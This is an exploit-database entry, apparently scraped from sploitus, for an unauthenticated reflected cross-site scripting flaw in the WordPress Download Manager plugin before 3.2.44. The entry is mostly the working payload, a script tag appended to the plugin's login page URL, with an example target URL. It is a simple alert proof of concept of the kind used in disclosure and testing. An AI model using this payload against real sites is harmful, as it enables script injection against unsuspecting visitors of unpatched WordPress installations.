Exploit for Download Manager < 3.2.44 - Unauthenticated Reflected Cross-Site Scripting

Name: Exploit for Download Manager < 3.2.44 - Unauthenticated Reflected Cross-Site Scripting
Rating: 5 (63 reviews)

2022-06-27 | CVSS 0.4

## https://sploitus.com/exploit?id=WPEX-ID:95DEB79C-BF19-4AB5-AAC6-702A13323356
On the login page from the plugin (ie where the [wpdm_login_form] is embed), append ?a"><script>alert(/XSS/)</script>

e.g: against an unauthenticated user, https://example.com/wpdm-login/?a"><script>alert(/XSS/)</script>